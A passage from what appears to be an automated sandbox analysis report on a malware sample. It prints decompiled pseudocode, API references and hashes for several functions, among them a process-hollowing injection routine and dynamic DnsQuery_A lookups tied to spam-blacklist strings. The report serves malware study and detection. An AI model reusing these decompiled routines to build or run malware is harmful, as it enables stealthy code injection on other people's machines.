					E0040EA84(1, _t93, "net_type",  *(_t96 + 0x14));
					_t47 = E0040F04E(0);
					 *0x4122f0 = _t47;
				}
				return _t47;
			}














                                                                                0x0040201e
                                                                                0x00402020
                                                                                0x0040202f
                                                                                0x0040202f
                                                                                0x0040203b
                                                                                0x0040203d
                                                                                0x0040204c
                                                                                0x0040204c
                                                                                0x00402058
                                                                                0x0040205a
                                                                                0x00402069
                                                                                0x00402069
                                                                                0x00402078
                                                                                0x00402080
                                                                                0x0040208e
                                                                                0x00402090
                                                                                0x00402095
                                                                                0x0040209a
                                                                                0x0040209c
                                                                                0x004020a1
                                                                                0x004020ab
                                                                                0x00000000
                                                                                0x004020ad
                                                                                0x004020ad
                                                                                0x004020bd
                                                                                0x004020d0
                                                                                0x004020d0
                                                                                0x004020d0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004020bd
                                                                                0x00000000
                                                                                0x004020bf
                                                                                0x004020bf
                                                                                0x004020c0
                                                                                0x004020c9
                                                                                0x004020ce
                                                                                0x004020d4
                                                                                0x004020d6
                                                                                0x004020d6
                                                                                0x004020e5
                                                                                0x004020e7
                                                                                0x004020ec
                                                                                0x004020f1
                                                                                0x004020f3
                                                                                0x004020f8
                                                                                0x00402102
                                                                                0x00000000
                                                                                0x00402104
                                                                                0x00402104
                                                                                0x00402114
                                                                                0x00402127
                                                                                0x00402127
                                                                                0x00402127
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402114
                                                                                0x00000000
                                                                                0x00402116
                                                                                0x00402116
                                                                                0x00402117
                                                                                0x00402120
                                                                                0x00402125
                                                                                0x0040212b
                                                                                0x0040212d
                                                                                0x0040212d
                                                                                0x0040213f
                                                                                0x00402151
                                                                                0x00402159
                                                                                0x00402160
                                                                                0x0040216a
                                                                                0x00402170
                                                                                0x00402189
                                                                                0x00402197
                                                                                0x0040219c
                                                                                0x004021a1
                                                                                0x004021c1
                                                                                0x004021c1
                                                                                0x004021a3
                                                                                0x004021a3
                                                                                0x004021a7
                                                                                0x00000000
                                                                                0x004021a9
                                                                                0x004021ad
                                                                                0x004021ae
                                                                                0x004021b6
                                                                                0x004021b9
                                                                                0x004021b9
                                                                                0x004021a7
                                                                                0x004021a1
                                                                                0x004021d1
                                                                                0x004021da
                                                                                0x004021e7
                                                                                0x004021ed
                                                                                0x004021f5
                                                                                0x004021f5
                                                                                0x00402204

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402078
                                                                                • GetTickCount.KERNEL32 ref: 004020D4
                                                                                • GetTickCount.KERNEL32 ref: 004020DB
                                                                                • GetTickCount.KERNEL32 ref: 0040212B
                                                                                • GetTickCount.KERNEL32 ref: 00402132
                                                                                • GetTickCount.KERNEL32 ref: 00402142
                                                                                  • Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,76A1F210,80000001,00000000,0040E513,?,?,?,?,000000E4), ref: 0040F089
                                                                                  • Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,76A1F210,80000001,00000000,0040E513,?,?,?,?,000000E4,000000C8), ref: 0040F093
                                                                                  • Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
                                                                                  • Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899
                                                                                  • Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                • String ID: localcfg$net_type$rbl_bl$rbl_ip
                                                                                • API String ID: 3976553417-1522128867
                                                                                • Opcode ID: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                • Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
                                                                                • Opcode Fuzzy Hash: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                • Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F315 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • htons.WS2_32(0040CA1D), ref: 0040F34D
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
                                                                                • closesocket.WS2_32(00000000), ref: 0040F375
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: closesockethtonssocket
                                                                                • String ID: time_cfg
                                                                                • API String ID: 311057483-2401304539
                                                                                • Opcode ID: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
                                                                                • Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
                                                                                • Opcode Fuzzy Hash: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
                                                                                • Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040C2DC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 182threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E0040C2DC(void* __ebp, signed int _a4) {
				void* _t86;
				signed int _t90;
				signed int _t91;
				long _t93;
				signed int _t95;
				signed int _t101;
				signed int _t108;
				signed int _t112;
				signed int _t115;
				long _t117;
				long _t118;
				signed int _t120;
				struct _SECURITY_ATTRIBUTES* _t122;
				signed int _t123;
				signed int _t132;
				signed int _t148;
				signed char _t151;
				signed int _t154;
				signed int _t156;
				signed char* _t157;
				void* _t158;
				signed int _t163;

				_t158 = __ebp;
				_t157 = _a4;
				E0040A4C7(_t157);
				_t122 = 0;
				if(_t157[0x44] == 0) {
					_t157[8] = 0;
					_t157[0x34] = 0;
					_t157[0x38] = 0;
					_t157[0x3c] = 0;
					_t157[0x54] = 0;
					_t157[0x40] = 0;
					_t157[0x58] = 0;
					L31:
					_t82 =  &(_t157[4]); // 0x40c4e4
					_t86 = _t82;
					_t148 =  !( *_t157) & 0x00000001;
					_t157[0x5c] = _t122;
					_t84 =  &(_t157[8]); // 0xfffffdf0
					if( *_t86 >=  *_t84) {
						L34:
						return _t86;
					}
					_t86 = CreateThread(_t122, _t122, E0040B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
					if(_t86 == _t122) {
						goto L34;
					}
					return CloseHandle(_t86);
				}
				if(_t157[8] != 0) {
					__eflags = _t157[0x48];
					if(_t157[0x48] == 0) {
						L5:
						_t12 =  &(_t157[0x10]); // 0x59be026a
						_t90 =  *_t12;
						_t157[8] = _t90;
						_t157[0x34] = _t90;
						_t91 = _t90 * 0x3e8;
						__eflags = _t91;
						_t157[0x38] = _t122;
						_t157[0x3c] = _t122;
						_t157[0x1c] = _t90 * 0x2710;
						_t157[0x20] = _t91;
						goto L6;
					}
					_t118 = GetTickCount();
					_t11 =  &(_t157[0x48]); // 0x13740041
					__eflags = _t118 -  *_t11 - 0x927c0;
					if(_t118 -  *_t11 < 0x927c0) {
						goto L6;
					}
					goto L5;
				} else {
					_t4 =  &(_t157[0xc]); // 0x5756c359
					_t120 =  *_t4;
					_t157[0x1c] = _t120 * 0x2710;
					_t157[8] = _t120;
					_t157[0x20] = _t120 * 0x3e8;
					_t157[0x34] = _t120;
					_t157[0x48] = GetTickCount();
					L6:
					if(( *_t157 & 0x00000001) == 0) {
						_t73 =  &(_t157[0x34]); // 0xa1c35e5f
						_t157[8] =  *_t73;
						goto L31;
					}
					_t93 = GetTickCount();
					_t21 =  &(_t157[0x4c]); // 0x26fce850
					if(_t93 -  *_t21 >= 0x2710) {
						goto L31;
					}
					if(_t157[0x54] == _t122) {
						_t95 = 0x3e8;
					} else {
						_t117 = GetTickCount();
						_t23 =  &(_t157[0x54]); // 0x41366c1d
						_t95 = _t117 -  *_t23;
					}
					_t123 = _t95;
					if(_t95 < 1) {
						_t123 = 1;
					}
					if(_t123 > 0x4e20) {
						_t123 = 0x4e20;
					}
					_t24 =  &(_t157[0x58]); // 0x701d8900
					_t25 =  &(_t157[0x40]); // 0x74c33b57
					_t151 =  *_t25;
					_t132 =  *_t24 * 0x3e8;
					_push(_t158);
					asm("cdq");
					_push(0x14);
					_a4 = _t123;
					asm("cdq");
					_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
					if(_t101 == 0) {
						__eflags = _t132 - _t151;
						if(__eflags == 0) {
							goto L22;
						}
						if(__eflags >= 0) {
							_t156 = _t151 + 1;
							__eflags = _t156;
						} else {
							_t156 = _t151 - 1;
						}
						goto L21;
					} else {
						_t156 = _t151 + _t101;
						L21:
						_t157[0x40] = _t156;
						L22:
						if(_t157[0x40] < 0) {
							_t157[0x40] = _t157[0x40] & 0x00000000;
						}
						_t39 =  &(_t157[0x40]); // 0x74c33b57
						_t163 = (0xc8 -  *_t39) * 0x14;
						if(_t123 > 0x3e8) {
							_a4 = 0x3e8;
						}
						asm("cdq");
						_t46 =  &(_t157[0x14]); // 0x5f004120
						_t47 =  &(_t157[0x10]); // 0x59be026a
						asm("cdq");
						_t49 =  &(_t157[0x30]); // 0xe4754f45
						_t54 =  &(_t157[0x20]); // 0x406a0000
						_t108 = E0040A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t56 =  &(_t157[0x2c]); // 0xc68314c4
						_t157[0x20] = _t108;
						_t112 = E0040A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t122 = 0;
						_t157[0x58] = 0;
						_t154 = _t112 / 0x3e8;
						_t157[0x54] = GetTickCount();
						_t68 =  &(_t157[0x34]); // 0xa1c35e5f
						_t115 =  *_t68;
						if(_t115 <= _t154) {
							_t157[8] = _t115;
							_t157[0x20] = _t115 * 0x3e8;
						} else {
							_t157[8] = _t154;
							_t157[0x1c] = _t154 * 0x2710;
						}
						goto L31;
					}
				}
			}

























                                                                                0x0040c2dc
                                                                                0x0040c2de
                                                                                0x0040c2e4
                                                                                0x0040c2e9
                                                                                0x0040c2ef
                                                                                0x0040c482
                                                                                0x0040c485
                                                                                0x0040c488
                                                                                0x0040c48b
                                                                                0x0040c48e
                                                                                0x0040c491
                                                                                0x0040c494
                                                                                0x0040c497
                                                                                0x0040c499
                                                                                0x0040c499
                                                                                0x0040c4a0
                                                                                0x0040c4a3
                                                                                0x0040c4a6
                                                                                0x0040c4a9
                                                                                0x0040c4d5
                                                                                0x0040c4d5
                                                                                0x0040c4d5
                                                                                0x0040c4c1
                                                                                0x0040c4c9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c4cc
                                                                                0x0040c2fe
                                                                                0x0040c326
                                                                                0x0040c329
                                                                                0x0040c337
                                                                                0x0040c337
                                                                                0x0040c337
                                                                                0x0040c342
                                                                                0x0040c345
                                                                                0x0040c348
                                                                                0x0040c348
                                                                                0x0040c34e
                                                                                0x0040c351
                                                                                0x0040c354
                                                                                0x0040c357
                                                                                0x00000000
                                                                                0x0040c357
                                                                                0x0040c32b
                                                                                0x0040c32d
                                                                                0x0040c330
                                                                                0x0040c335
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c300
                                                                                0x0040c300
                                                                                0x0040c300
                                                                                0x0040c30b
                                                                                0x0040c316
                                                                                0x0040c319
                                                                                0x0040c31c
                                                                                0x0040c321
                                                                                0x0040c35a
                                                                                0x0040c35d
                                                                                0x0040c47a
                                                                                0x0040c47d
                                                                                0x00000000
                                                                                0x0040c47d
                                                                                0x0040c363
                                                                                0x0040c365
                                                                                0x0040c36d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c376
                                                                                0x0040c37f
                                                                                0x0040c378
                                                                                0x0040c378
                                                                                0x0040c37a
                                                                                0x0040c37a
                                                                                0x0040c37a
                                                                                0x0040c384
                                                                                0x0040c389
                                                                                0x0040c38d
                                                                                0x0040c38d
                                                                                0x0040c395
                                                                                0x0040c397
                                                                                0x0040c397
                                                                                0x0040c399
                                                                                0x0040c39c
                                                                                0x0040c39c
                                                                                0x0040c39f
                                                                                0x0040c3ac
                                                                                0x0040c3ad
                                                                                0x0040c3b5
                                                                                0x0040c3b8
                                                                                0x0040c3bc
                                                                                0x0040c3bd
                                                                                0x0040c3c1
                                                                                0x0040c3c7
                                                                                0x0040c3c9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c3cb
                                                                                0x0040c3d0
                                                                                0x0040c3d0
                                                                                0x0040c3cd
                                                                                0x0040c3cd
                                                                                0x0040c3cd
                                                                                0x00000000
                                                                                0x0040c3c3
                                                                                0x0040c3c3
                                                                                0x0040c3d1
                                                                                0x0040c3d1
                                                                                0x0040c3d4
                                                                                0x0040c3d8
                                                                                0x0040c3da
                                                                                0x0040c3da
                                                                                0x0040c3e3
                                                                                0x0040c3eb
                                                                                0x0040c3f0
                                                                                0x0040c3f2
                                                                                0x0040c3f2
                                                                                0x0040c3fd
                                                                                0x0040c405
                                                                                0x0040c408
                                                                                0x0040c419
                                                                                0x0040c41a
                                                                                0x0040c41d
                                                                                0x0040c421
                                                                                0x0040c42a
                                                                                0x0040c42b
                                                                                0x0040c430
                                                                                0x0040c436
                                                                                0x0040c43b
                                                                                0x0040c443
                                                                                0x0040c448
                                                                                0x0040c44b
                                                                                0x0040c453
                                                                                0x0040c456
                                                                                0x0040c456
                                                                                0x0040c45c
                                                                                0x0040c46c
                                                                                0x0040c475
                                                                                0x0040c45e
                                                                                0x0040c45e
                                                                                0x0040c467
                                                                                0x0040c467
                                                                                0x00000000
                                                                                0x0040c45c
                                                                                0x0040c3c1

                                                                                APIs
                                                                                  • Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                  • Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                • GetTickCount.KERNEL32 ref: 0040C31F
                                                                                • GetTickCount.KERNEL32 ref: 0040C32B
                                                                                • GetTickCount.KERNEL32 ref: 0040C363
                                                                                • GetTickCount.KERNEL32 ref: 0040C378
                                                                                • GetTickCount.KERNEL32 ref: 0040C44D
                                                                                • InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
                                                                                • CreateThread.KERNEL32 ref: 0040C4C1
                                                                                • CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                • String ID: localcfg
                                                                                • API String ID: 1553760989-1857712256
                                                                                • Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                • Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
                                                                                • Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                • Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02083059 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97memorylibrarynetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(iphlpapi.dll), ref: 02083068
                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02083078
                                                                                • GetProcAddress.KERNEL32(00000000,00410408), ref: 02083095
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 020830B6
                                                                                • htons.WS2_32(00000035), ref: 020830EF
                                                                                • inet_addr.WS2_32(?), ref: 020830FA
                                                                                • gethostbyname.WS2_32(?), ref: 0208310D
                                                                                • HeapFree.KERNEL32(00000000), ref: 0208314D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressAllocateFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                • String ID: iphlpapi.dll
                                                                                • API String ID: 2869546040-3565520932
                                                                                • Opcode ID: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                • Instruction ID: eeffcc8ca208f68e89b0066492fda497da2aee10249669ccbcdfbe4c173ffa14
                                                                                • Opcode Fuzzy Hash: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                • Instruction Fuzzy Hash: 7C31D331A00306ABDF52ABB8DC48BBF77F8AF84F24F1441A5E558E3290DB74D5819B58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402D21 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85memorylibrarystringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 59%
                                                                                			E00402D21(intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				char _v28;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;
				long* _t30;
				intOrPtr* _t37;
				long _t39;
				long _t40;
				void* _t41;

				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_t19 = GetModuleHandleA( &_v28);
				_t39 = 0;
				if(_t19 != 0) {
					L3:
					_t20 = GetProcAddress(_t19, "DnsQuery_A");
					if(_t20 == _t39) {
						L2:
						return 0;
					}
					_push(_t39);
					_t35 =  &_v16;
					_push( &_v16);
					_push(_t39);
					_push(_t39);
					_push(0xf);
					_push(_a4);
					if( *_t20() != 0) {
						goto L2;
					}
					_t37 = _v16;
					_v8 = _t39;
					_v12 = _t39;
					if(_t37 == _t39) {
						L14:
						return _v12;
					}
					do {
						if( *((short*)(_t37 + 8)) != 0xf) {
							goto L12;
						}
						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
						if(_t40 == 0) {
							break;
						}
						E0040EE2A(_t35, _t40, 0, 0x108);
						_t41 = _t41 + 0xc;
						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
						_t13 = _t40 + 8; // 0x8
						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
						_t30 = _v8;
						_v8 = _t40;
						if(_t30 != 0) {
							 *_t30 = _t40;
						} else {
							_v12 = _t40;
						}
						L12:
						_t37 =  *_t37;
						_t39 = 0;
					} while (_t37 != 0);
					goto L14;
				}
				_t19 = LoadLibraryA( &_v28);
				if(_t19 != 0) {
					goto L3;
				}
				goto L2;
			}














                                                                                0x00402d31
                                                                                0x00402d32
                                                                                0x00402d33
                                                                                0x00402d39
                                                                                0x00402d3a
                                                                                0x00402d40
                                                                                0x00402d44
                                                                                0x00402d5b
                                                                                0x00402d61
                                                                                0x00402d69
                                                                                0x00402d54
                                                                                0x00000000
                                                                                0x00402d54
                                                                                0x00402d6b
                                                                                0x00402d6c
                                                                                0x00402d6f
                                                                                0x00402d70
                                                                                0x00402d71
                                                                                0x00402d72
                                                                                0x00402d74
                                                                                0x00402d7b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402d7d
                                                                                0x00402d80
                                                                                0x00402d83
                                                                                0x00402d88
                                                                                0x00402deb
                                                                                0x00000000
                                                                                0x00402deb
                                                                                0x00402d90
                                                                                0x00402d95
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402da6
                                                                                0x00402daa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402db0
                                                                                0x00402db9
                                                                                0x00402dc1
                                                                                0x00402dc7
                                                                                0x00402dcb
                                                                                0x00402dd1
                                                                                0x00402dd4
                                                                                0x00402dd9
                                                                                0x00402de0
                                                                                0x00402ddb
                                                                                0x00402ddb
                                                                                0x00402ddb
                                                                                0x00402de2
                                                                                0x00402de2
                                                                                0x00402de4
                                                                                0x00402de6
                                                                                0x00000000
                                                                                0x00402dea
                                                                                0x00402d4a
                                                                                0x00402d52
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,74D0EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00402DA0
                                                                                • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                • String ID: DnsQuery_A$dnsapi.dll
                                                                                • API String ID: 3560063639-3847274415
                                                                                • Opcode ID: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
                                                                                • Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
                                                                                • Opcode Fuzzy Hash: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
                                                                                • Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406CC9 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 84libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 80%
                                                                                			E00406CC9(void* __ecx) {
				_Unknown_base(*)()* _t8;
				CHAR* _t17;
				void* _t18;
				void* _t23;
				char _t25;
				void* _t34;

				_t23 = __ecx;
				if( *0x412e08 != 0) {
					L14:
					return 0x412e08;
				}
				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
				if(_t8 == 0) {
					L4:
					if(GetSystemDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
						if(GetWindowsDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
							E0040EF00(0x412e08, E00402544(0x4122f8, 0x410664, 0xb, 0xe4, 0xc8));
							E0040EE2A(_t23, 0x4122f8, 0, 0x100);
							_t34 = _t34 + 0x28;
						}
						E0040EF1E(0x412e08, E00402544(0x4122f8, 0x410658, 0xb, 0xe4, 0xc8));
						E0040EE2A(_t23, 0x4122f8, 0, 0x100);
					}
					L10:
					_t17 = 0x412e08;
					goto L11;
					L11:
					_t25 =  *_t17;
					_t17 =  &(_t17[1]);
					if(_t25 != 0) {
						goto L11;
					} else {
						_t18 = _t17 - 0x412e09;
						if( *((char*)(_t18 + 0x412e07)) != 0x5c) {
							 *((char*)(_t18 + 0x412e08)) = 0x5c;
							 *((char*)(_t18 + 0x412e09)) = _t25;
						}
						goto L14;
					}
				}
				_push(0x104);
				_push(0x412e08);
				if( *_t8() == 0 ||  *0x412e08 == 0) {
					goto L4;
				} else {
					goto L10;
				}
			}









                                                                                0x00406cc9
                                                                                0x00406cd6
                                                                                0x00406dbe
                                                                                0x00406dc1
                                                                                0x00406dc1
                                                                                0x00406cee
                                                                                0x00406cfb
                                                                                0x00406d12
                                                                                0x00406d1c
                                                                                0x00406d40
                                                                                0x00406d60
                                                                                0x00406d69
                                                                                0x00406d6e
                                                                                0x00406d6e
                                                                                0x00406d86
                                                                                0x00406d8f
                                                                                0x00406d98
                                                                                0x00406d99
                                                                                0x00406d99
                                                                                0x00406d9e
                                                                                0x00406d9f
                                                                                0x00406d9f
                                                                                0x00406da1
                                                                                0x00406da4
                                                                                0x00000000
                                                                                0x00406da6
                                                                                0x00406da6
                                                                                0x00406daf
                                                                                0x00406db1
                                                                                0x00406db8
                                                                                0x00406db8
                                                                                0x00000000
                                                                                0x00406daf
                                                                                0x00406da4
                                                                                0x00406cfd
                                                                                0x00406cfe
                                                                                0x00406d03
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$PromptOnSecureDesktop$kernel32
                                                                                • API String ID: 1082366364-2834986871
                                                                                • Opcode ID: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
                                                                                • Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
                                                                                • Opcode Fuzzy Hash: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
                                                                                • Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040977C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82threadinjectionprocessCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E0040977C(void* __ecx, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				void _v24;
				char _v28;
				struct _STARTUPINFOA _v96;
				struct _CONTEXT _v812;
				void* _t33;

				_t46 = __ecx;
				E0040EE2A(__ecx,  &_v96, 0, 0x44);
				_v96.cb = 0x44;
				if(CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20) != 0) {
					E0040EE2A(_t46,  &_v812, 0, 0x2cc);
					_v812.ContextFlags = 0x10002;
					if(GetThreadContext(_v20.hThread,  &_v812) != 0) {
						_t33 = E0040637C(_entry_, _v20.hProcess,  &_v28,  &_v24);
						_push(0);
						if(_t33 == 0) {
							L4:
							TerminateProcess(_v20.hProcess, ??);
							goto L1;
						}
						if(WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??) == 0) {
							goto L3;
						}
						_v812.Eax = _v28;
						if(SetThreadContext(_v20.hThread,  &_v812) == 0) {
							goto L3;
						}
						ResumeThread(_v20.hThread);
						return 1;
					}
					L3:
					_push(0);
					goto L4;
				}
				L1:
				return 0;
			}









                                                                                0x0040977c
                                                                                0x0040978f
                                                                                0x004097a9
                                                                                0x004097b9
                                                                                0x004097cf
                                                                                0x004097e1
                                                                                0x004097f3
                                                                                0x00409811
                                                                                0x00409819
                                                                                0x0040981c
                                                                                0x004097f6
                                                                                0x004097f9
                                                                                0x00000000
                                                                                0x004097f9
                                                                                0x00409839
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040983e
                                                                                0x00409856
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040985b
